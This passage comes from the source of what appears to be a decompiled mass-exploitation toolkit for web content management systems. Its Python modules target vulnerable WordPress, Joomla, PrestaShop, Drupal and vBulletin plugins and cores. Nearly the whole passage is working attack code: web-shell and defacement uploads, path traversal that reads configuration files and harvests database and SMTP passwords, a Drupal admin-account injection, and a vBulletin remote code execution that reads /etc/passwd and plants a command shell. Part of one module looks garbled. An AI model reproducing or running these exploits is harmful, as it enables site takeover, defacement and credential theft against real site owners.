'/?q=node&destination=node', timeout=10, data=POSTDATA, headers=agent) 32 | if 'mb_strlen() expects parameter 1' in str(resp.content): 33 | with open('result/AdminTakeover_results.txt', 'a') as writer: 34 | writer.write(site + '/user/login\n Username: {}\n Password: {}\n------------------------------------------\n'.format(user, password)) 35 | return printModule.returnYes(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal') 36 | return printModule.returnNo(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal') 37 | except: 38 | return printModule.returnNo(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_s5_media_player.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_s5_media_player.py 6 | import requests 7 | import re 8 | from Exploits import printModule 9 | from Tools import getSMTP 10 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 11 | r = '\x1b[31m' 12 | g = '\x1b[32m' 13 | y = '\x1b[33m' 14 | b = '\x1b[34m' 15 | m = '\x1b[35m' 16 | c = '\x1b[36m' 17 | w = '\x1b[37m' 18 | 19 | def Exploit(site): 20 | try: 21 | Exp = 'http://' + site + '/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=' 22 | GetConfig = requests.get(Exp, timeout=10, headers=Headers) 23 | if 'JConfig' in str(GetConfig.content): 24 | with open('result/Config_results.txt', 'a') as ww: 25 | ww.write('Full Config Path : ' + Exp + '\n') 26 | try: 27 | Gethost = re.findall("host = '(.*)';", str(GetConfig.content)) 28 | Getuser = re.findall("user = '(.*)';", str(GetConfig.content)) 29 | Getpass = re.findall("password = '(.*)';", str(GetConfig.content)) 30 | Getdb = re.findall("db = '(.*)';", str(GetConfig.content)) 31 | with open('result/Config_results.txt', 'a') as ww: 32 | ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] + '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') 33 | getSMTP.GETSmtpJoomConf(str(GetConfig.content)) 34 | except: 35 | return printModule.returnYes(site, 'N/A', 'Com_s5_media_player', 'Joomla') 36 | 37 | return printModule.returnYes(site, 'N/A', 'Com_s5_media_player', 'Joomla') 38 | return printModule.returnNo(site, 'N/A', 'Com_s5_media_player', 'Joomla') 39 | except: 40 | return printModule.returnNo(site, 'N/A', 'Com_s5_media_player', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_addblockblocker.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Wp_addblockblocker.py 6 | import requests 7 | import time 8 | from Exploits import printModule 9 | pagelinesExploitShell = 'files/settings_auto.php' 10 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 11 | } 12 | year = time.strftime('%y') 13 | month = time.strftime('%m') 14 | 15 | def Exploit(site): 16 | try: 17 | ShellFile = {'popimg': open(pagelinesExploitShell, 'rb')} 18 | Exp = 'http://' + site + '/wp-admin/admin-ajax.php?action=getcountryuser&cs=2' 19 | requests.post(Exp, files=ShellFile, timeout=10, headers=Headers) 20 | CheckShell = 'http://' + site + '/wp-content/uploads/20' + year + '/' + month + '/' + pagelinesExploitShell.split('/')[1] 21 | GoT = requests.get(CheckShell, timeout=10, headers=Headers) 22 | if GoT.status_code == 200: 23 | CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=10, headers=Headers) 24 | CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=10, headers=Headers) 25 | if 'Vuln!!' in CheckShell.content: 26 | with open('result/Shell_results.txt', 'a') as writer: 27 | writer.write(site + '/wp-content/vuln.php' + '\n') 28 | if 'Vuln!!' in CheckIndex.content: 29 | with open('result/Index_results.txt', 'a') as writer: 30 | writer.write(site + '/vuln.htm' + '\n') 31 | return printModule.returnYes(site, 'N/A', 'addblockblocker', 'Wordpress') 32 | else: 33 | return printModule.returnNo(site, 'N/A', 'addblockblocker', 'Wordpress') 34 | 35 | else: 36 | return printModule.returnNo(site, 'N/A', 'addblockblocker', 'Wordpress') 37 | except: 38 | return printModule.returnNo(site, 'N/A', 'addblockblocker', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/com_media.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\com_media.py 6 | import requests 7 | import re 8 | from Exploits import printModule 9 | TextindeX = 'files/vuln.txt' 10 | 11 | def Exploit(site): 12 | headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0'} 13 | sess = requests.session() 14 | try: 15 | GET = sess.get('http://' + site + '/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=', timeout=10, headers=headers) 16 | if 'task=file.upload' in str(GET.content): 17 | try: 18 | Uploader = re.findall('action="(.*)" id="uploadForm"', str(GET.content))[0] 19 | if Uploader.startswith('http://'): 20 | Uploader = Uploader.replace('http://', '') 21 | else: 22 | if Uploader.startswith('https://'): 23 | Uploader = Uploader.replace('https://', '') 24 | POSTDATA = {'Filedata[]': open(TextindeX, 'rb')} 25 | sess.post('http://' + Uploader, files=POSTDATA, headers=headers, timeout=10) 26 | CheckIndex = requests.get('http://' + site + '/images/vuln.txt', timeout=10, headers=headers).content 27 | if 'Vuln!!' in str(CheckIndex): 28 | with open('result/Index_results.txt', 'a') as writer: 29 | writer.write(site + '/images/vuln.txt\n') 30 | return printModule.returnYes(site, 'N/A', 'Com_Media', 'Joomla') 31 | return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla') 32 | except: 33 | return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla') 34 | 35 | else: 36 | return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla') 37 | except: 38 | return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/pagelinesExploit.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\pagelinesExploit.py 6 | import requests 7 | from Exploits import printModule 8 | from Tools import wsoShellUploaderModule 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 17 | 18 | def Exploit(site): 19 | try: 20 | FileShell = {'file': open('files/settings_auto.php', 'rb')} 21 | PostData = {'settings_upload': 'settings','page': 'pagelines'} 22 | Useragent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 23 | url = 'http://' + site + '/wp-admin/admin-post.php' 24 | GoT = requests.post(url, files=FileShell, data=PostData, headers=Useragent, timeout=10) 25 | if GoT.status_code == 200: 26 | CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=10, headers=Headers) 27 | CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=10, headers=Headers) 28 | if 'Vuln!!' in str(CheckShell.content): 29 | with open('result/Shell_results.txt', 'a') as writer: 30 | writer.write(site + '/wp-content/vuln.php' + '\n') 31 | wsoShellUploaderModule.UploadWso2(site + '/wp-content/vuln.php') 32 | if 'Vuln!!' in str(CheckIndex.content): 33 | with open('result/Index_results.txt', 'a') as writer: 34 | writer.write(site + '/vuln.htm' + '\n') 35 | return printModule.returnYes(site, 'N/A', 'Pagelines RFU', 'Wordpress') 36 | else: 37 | return printModule.returnNo(site, 'N/A', 'Pagelines RFU', 'Wordpress') 38 | 39 | else: 40 | return printModule.returnNo(site, 'N/A', 'Pagelines RFU', 'Wordpress') 41 | except: 42 | return printModule.returnNo(site, 'N/A', 'Pagelines RFU', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_columnadverts.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_columnadverts.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | 17 | def Exploit(site): 18 | try: 19 | Exp = site + '/modules/columnadverts/uploadimage.php' 20 | FileDataIndex = {'userfile': open('files/pwn.gif', 'rb')} 21 | FileDataShell = {'userfile': open('files/up.php', 'rb')} 22 | GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers) 23 | if 'success' in GoT.content: 24 | IndexPath = '/modules/columnadverts/slides/pwn.gif' 25 | CheckIndex = requests.get('http://' + site + IndexPath, timeout=10, headers=Headers) 26 | if 'GIF89a' in str(CheckIndex.content): 27 | with open('result/Index_results.txt', 'a') as writer: 28 | writer.write(IndexPath + '\n') 29 | requests.post('http://' + Exp, files=FileDataShell, timeout=10, headers=Headers) 30 | ShellPath = '/modules/columnadverts/slides/up.php' 31 | CheckShell = requests.get('http://' + site + ShellPath, timeout=10, headers=Headers) 32 | if 'Vuln!!' in str(CheckShell.content): 33 | with open('result/Shell_results.txt', 'a') as writer: 34 | writer.write(site + ShellPath + '\n') 35 | return printModule.returnYes(site, 'N/A', 'Columnadverts Module', 'Prestashop') 36 | else: 37 | return printModule.returnNo(site, 'N/A', 'Columnadverts Module', 'Prestashop') 38 | 39 | else: 40 | return printModule.returnNo(site, 'N/A', 'Columnadverts Module', 'Prestashop') 41 | except: 42 | return printModule.returnNo(site, 'N/A', 'Columnadverts Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_JCEindex.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_JCEindex.py 6 | import requests 7 | from Exploits import printModule 8 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Jce_Deface_image = 'files/vuln.gif' 17 | 18 | def Exploit(site): 19 | try: 20 | fileDeface = {'Filedata': open(Jce_Deface_image, 'rb')} 21 | post_data = {'upload-dir': '../../','upload-overwrite': '0','action': 'upload'} 22 | Exp = 'http://' + site + '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form' 23 | Post = requests.post(Exp, files=fileDeface, data=post_data, timeout=5, headers=Headers) 24 | OtherMethod = '"text":"' + Jce_Deface_image.split('/')[1] + '"' 25 | if OtherMethod in str(Post.content): 26 | with open('result/Index_results.txt', 'a') as writer: 27 | writer.write(site + '/' + Jce_Deface_image.split('/')[1] + '\n') 28 | return printModule.returnYes(site, 'N/A', 'Com_JCE', 'Joomla') 29 | if OtherMethod not in str(Post.content): 30 | post_data2 = {'upload-dir': '../','upload-overwrite': '0','action': 'upload'} 31 | Post = requests.post(Exp, files=fileDeface, data=post_data2, timeout=5, headers=Headers) 32 | if OtherMethod in str(Post.content): 33 | with open('result/Index_results.txt', 'a') as writer: 34 | writer.write(site + '/images/' + Jce_Deface_image.split('/')[1] + '\n') 35 | return printModule.returnYes(site, 'N/A', 'Com_JCE Index', 'Joomla') 36 | else: 37 | return printModule.returnNo(site, 'N/A', 'Com_JCE Index', 'Joomla') 38 | 39 | else: 40 | return printModule.returnNo(site, 'N/A', 'Com_JCE Index', 'Joomla') 41 | except: 42 | return printModule.returnNo(site, 'N/A', 'Com_JCE Index', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/wp_barclaycart.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\wp_barclaycart.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | pagelinesExploitShell = 'files/settings_auto.php' 17 | 18 | def Exploit(site): 19 | try: 20 | ShellFile = {'Filedata': (pagelinesExploitShell, open(pagelinesExploitShell, 'rb'), 21 | 'multipart/form-data') 22 | } 23 | Exp = 'http://' + site + '/wp-content/plugins/barclaycart/uploadify/uploadify.php' 24 | requests.post(Exp, files=ShellFile, timeout=10, headers=Headers) 25 | Shell = 'http://' + site + '/wp-content/plugins/barclaycart/uploadify/' + pagelinesExploitShell.split('/')[1] 26 | GoT = requests.get(Shell, timeout=10, headers=Headers) 27 | if GoT.status_code == 200: 28 | CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=10, headers=Headers) 29 | CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=10, headers=Headers) 30 | if 'Vuln!!' in CheckShell.content: 31 | with open('result/Shell_results.txt', 'a') as writer: 32 | writer.write(site + '/wp-content/vuln.php' + '\n') 33 | if 'Vuln!!' in CheckIndex.content: 34 | with open('result/Index_results.txt', 'a') as writer: 35 | writer.write(site + '/vuln.htm' + '\n') 36 | return printModule.returnYes(site, 'N/A', 'barclaycart Plugin', 'Wordpress') 37 | else: 38 | return printModule.returnNo(site, 'N/A', 'barclaycart Plugin', 'Wordpress') 39 | 40 | else: 41 | return printModule.returnNo(site, 'N/A', 'barclaycart Plugin', 'Wordpress') 42 | except: 43 | return printModule.returnNo(site, 'N/A', 'barclaycart Plugin', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Tools/getSMTP.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Tools\getSMTP.py 6 | import requests 7 | import re 8 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 9 | 10 | def GETSmtpJoomConf(ReadSMtpCnf): 11 | try: 12 | if 'public $smtpuser =' in ReadSMtpCnf: 13 | user = re.findall("smtpuser = '(.*)';", ReadSMtpCnf)[0] 14 | pw = re.findall("smtppass = '(.*)';", ReadSMtpCnf)[0] 15 | host = re.findall("smtphost = '(.*)';", ReadSMtpCnf)[0] 16 | port = re.findall("smtpport = '(.*)';", ReadSMtpCnf)[0] 17 | if user == '' or user == 'localhost': 18 | pass 19 | else: 20 | with open('result/SMTP_Results.txt', 'a') as writer: 21 | writer.write('HostName: {}'.format(host) + '\nuser: {}'.format(user) + '\nPass: {}'.format(pw) + '\nPORT: {}'.format(port) + '\n-----------------------------------------\n') 22 | except: 23 | pass 24 | 25 | 26 | def JooomlaSMTPshell(EvalShell): 27 | try: 28 | evsh = EvalShell 29 | EvalShell = EvalShell.split('=')[0] + '=' 30 | if 'system' in evsh: 31 | pass 32 | else: 33 | if EvalShell.startswith('http://'): 34 | EvalShell = EvalShell.replace('http://', '') 35 | elif EvalShell.startswith('https://'): 36 | EvalShell = EvalShell.replace('https://', '') 37 | path0 = EvalShell.split('/')[1] 38 | a = requests.get('http://{}'.format(EvalShell) + "echo '||';pwd;echo '||';", timeout=10, headers=Headers) 39 | path = str(a.content).split('||')[1] 40 | lastpath = path.split(path0)[0] 41 | try: 42 | lastpath = lastpath.split('\n')[1] 43 | except: 44 | pass 45 | 46 | x = "echo '||';cd {};cat configuration.php;echo '||';".format(str(lastpath)) 47 | ReadSMtpCnf = requests.get('http://{}/'.format(EvalShell) + x) 48 | GETSmtpJoomConf(str(ReadSMtpCnf.content)) 49 | except: 50 | pass -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_soopamobile.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_soopamobile.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | try: 21 | Exp = site + '/modules/soopamobile/uploadimage.php' 22 | FileDataIndex = {'userfile': open(Jce_Deface_image, 'rb')} 23 | FileDataShell = {'userfile': open(ShellPresta, 'rb')} 24 | GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5, headers=Headers) 25 | if 'success' in GoT.content: 26 | IndexPath = '/modules/soopamobile/slides/' + Jce_Deface_image.split('/')[1] 27 | CheckIndex = requests.get('http://' + site + IndexPath, timeout=5, headers=Headers) 28 | if 'GIF89a' in CheckIndex.content: 29 | with open('result/Index_results.txt', 'a') as writer: 30 | writer.write(IndexPath + '\n') 31 | requests.post('http://' + Exp, files=FileDataShell, timeout=5, headers=Headers) 32 | ShellPath = '/modules/soopamobile/slides/' + ShellPresta.split('/')[1] 33 | CheckShell = requests.get('http://' + site + ShellPath, timeout=5, headers=Headers) 34 | if 'Vuln!!' in CheckShell.content: 35 | with open('result/Shell_results.txt', 'a') as writer: 36 | writer.write(ShellPath + '\n') 37 | return printModule.returnYes(site, 'N/A', 'soopamobile Module', 'Prestashop') 38 | else: 39 | return printModule.returnNo(site, 'N/A', 'soopamobile Module', 'Prestashop') 40 | 41 | else: 42 | return printModule.returnNo(site, 'N/A', 'soopamobile Module', 'Prestashop') 43 | except: 44 | return printModule.returnNo(site, 'N/A', 'soopamobile Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/cherry_plugin.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\cherry_plugin.py 6 | import requests 7 | import re 8 | from Exploits import printModule 9 | from Tools import wsoShellUploaderModule 10 | pagelinesExploitShell = 'files/settings_auto.php' 11 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 12 | } 13 | 14 | def Exploit(site): 15 | try: 16 | ShellFile = {'file': (pagelinesExploitShell, open(pagelinesExploitShell, 'rb'), 17 | 'multipart/form-data') 18 | } 19 | Exp = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/upload.php' 20 | requests.post(Exp, files=ShellFile, timeout=10, headers=Headers) 21 | Shell = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/' + pagelinesExploitShell.split('/')[1] 22 | GoT = requests.get(Shell, timeout=10, headers=Headers) 23 | if GoT.status_code == 200: 24 | CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=10, headers=Headers) 25 | CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=10, headers=Headers) 26 | if 'Vuln!!' in str(CheckShell.content): 27 | with open('result/Shell_results.txt', 'a') as writer: 28 | writer.write(site + '/wp-content/vuln.php' + '\n') 29 | wsoShellUploaderModule.UploadWso2(site + '/wp-content/vuln.php') 30 | if 'Vuln!!' in str(CheckIndex.content): 31 | with open('result/Index_results.txt', 'a') as writer: 32 | writer.write(site + '/vuln.htm' + '\n') 33 | return printModule.returnYes(site, 'N/A', 'Wordpress Cherry-plugin', 'Wordpress') 34 | else: 35 | return printModule.returnNo(site, 'N/A', 'Wordpress Cherry-plugin', 'Wordpress') 36 | 37 | else: 38 | return printModule.returnNo(site, 'N/A', 'Wordpress Cherry-plugin', 'Wordpress') 39 | except: 40 | return printModule.returnNo(site, 'N/A', 'Wordpress Cherry-plugin', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_soopabanners.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_soopabanners.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | try: 21 | Exp = site + '/modules/soopabanners/uploadimage.php' 22 | FileDataIndex = {'userfile': open(Jce_Deface_image, 'rb')} 23 | FileDataShell = {'userfile': open(ShellPresta, 'rb')} 24 | GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers) 25 | if 'success' in GoT.content: 26 | IndexPath = '/modules/soopabanners/slides/' + Jce_Deface_image.split('/')[1] 27 | CheckIndex = requests.get('http://' + site + IndexPath, timeout=10, headers=Headers) 28 | if 'GIF89a' in CheckIndex.content: 29 | with open('result/Index_results.txt', 'a') as writer: 30 | writer.write(IndexPath + '\n') 31 | requests.post('http://' + Exp, files=FileDataShell, timeout=10, headers=Headers) 32 | ShellPath = '/modules/soopabanners/slides/' + ShellPresta.split('/')[1] 33 | CheckShell = requests.get('http://' + site + ShellPath, timeout=10, headers=Headers) 34 | if 'Vuln!!' in CheckShell.content: 35 | with open('result/Shell_results.txt', 'a') as writer: 36 | writer.write(ShellPath + '\n') 37 | return printModule.returnYes(site, 'N/A', 'soopabanners Module', 'Prestashop') 38 | else: 39 | return printModule.returnNo(site, 'N/A', 'soopabanners Module', 'Prestashop') 40 | 41 | else: 42 | return printModule.returnNo(site, 'N/A', 'soopabanners Module', 'Prestashop') 43 | except: 44 | return printModule.returnNo(site, 'N/A', 'soopabanners Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/viral_optinsExploit.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\viral_optinsExploit.py 6 | import requests 7 | import time 8 | import re 9 | from Exploits import printModule 10 | r = '\x1b[31m' 11 | g = '\x1b[32m' 12 | y = '\x1b[33m' 13 | b = '\x1b[34m' 14 | m = '\x1b[35m' 15 | c = '\x1b[36m' 16 | w = '\x1b[37m' 17 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 18 | year = time.strftime('%y') 19 | month = time.strftime('%m') 20 | 21 | def Exploit(site): 22 | try: 23 | defaceFile = {'Filedata': ( 24 | 'vuln.txt', open('files/vuln.txt', 'rb'), 'text/html') 25 | } 26 | x = requests.post('http://' + site + '/wp-content/plugins/viral-optins/api/uploader/file-uploader.php', files=defaceFile, timeout=5, headers=Headers) 27 | if 'id="wpvimgres"' in x.content: 28 | uploader = site + '/wp-content/uploads/20' + year + '/' + month + '/vuln.txt' 29 | GoT = requests.get('http://' + uploader, timeout=5, headers=Headers) 30 | find = re.findall('"'.format('system({}'.format('$_GET["cmd"]')) 19 | ShellPayload = "echo shell_exec('echo {} > vuln.php'); exit;".format(payloadshell) 20 | CheckVulnPayload = {'widgetConfig[code]': "echo shell_exec('cat /etc/passwd');exit;"} 21 | params = {'routestring': 'ajax/render/widget_php'} 22 | params['widgetConfig[code]'] = '{}'.format(CheckVulnPayload) 23 | try: 24 | resp = requests.post('http://' + site, data=params, timeout=10, headers=Headers) 25 | if 'root:x:' in str(resp.content): 26 | with open('result/vBulletinRCE_OK.txt', 'a') as writer: 27 | writer.write(site + ' --> CVE-2019-16759 Vulnerable' + '\n') 28 | try: 29 | params2 = {'routestring': 'ajax/render/widget_php'} 30 | params2['widgetConfig[code]'] = '{}'.format(ShellPayload) 31 | requests.post('http://' + site, data=params2, timeout=10, headers=Headers) 32 | Checkshell = requests.get('http://{}/vuln.php'.format(site), timeout=10, headers=Headers) 33 | if 'Vuln!!' in str(Checkshell.content): 34 | with open('result/Shell_results.txt', 'a') as writer: 35 | writer.write(site + '/vuln.php?cmd=id' + '\n') 36 | return printModule.returnYes(site, 'CVE-2019-16759', 'vBulletin RCE 5.x', 'vBulletin') 37 | except: 38 | return printModule.returnYes(site, 'CVE-2019-16759', 'vBulletin RCE 5.x', 'vBulletin') 39 | 40 | else: 41 | return printModule.returnNo(site, 'CVE-2019-16759', 'vBulletin RCE 5.x', 'vBulletin') 42 | except: 43 | return printModule.returnNo(site, 'CVE-2019-16759', 'vBulletin RCE 5.x', 'vBulletin') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_homepageadvertise2.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_homepageadvertise2.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | try: 21 | Exp = site + '/modules/homepageadvertise2/uploadimage.php' 22 | FileDataIndex = {'userfile': open(Jce_Deface_image, 'rb')} 23 | FileDataShell = {'userfile': open(ShellPresta, 'rb')} 24 | GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers) 25 | if 'success' in GoT.content: 26 | IndexPath = '/modules/homepageadvertise2/slides/' + Jce_Deface_image.split('/')[1] 27 | CheckIndex = requests.get('http://' + site + IndexPath, timeout=10, headers=Headers) 28 | if 'GIF89a' in CheckIndex.content: 29 | with open('result/Index_results.txt', 'a') as writer: 30 | writer.write(IndexPath + '\n') 31 | requests.post('http://' + Exp, files=FileDataShell, timeout=10, headers=Headers) 32 | ShellPath = '/modules/homepageadvertise2/slides/' + ShellPresta.split('/')[1] 33 | CheckShell = requests.get('http://' + site + ShellPath, timeout=10, headers=Headers) 34 | if 'Vuln!!' in CheckShell.content: 35 | with open('result/Shell_results.txt', 'a') as writer: 36 | writer.write(ShellPath + '\n') 37 | return printModule.returnYes(site, 'N/A', 'homepageadvertise2 Module', 'Prestashop') 38 | else: 39 | return printModule.returnNo(site, 'N/A', 'homepageadvertise2 Module', 'Prestashop') 40 | 41 | else: 42 | return printModule.returnNo(site, 'N/A', 'homepageadvertise2 Module', 'Prestashop') 43 | except: 44 | return printModule.returnNo(site, 'N/A', 'homepageadvertise2 Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_productpageadverts.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_productpageadverts.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 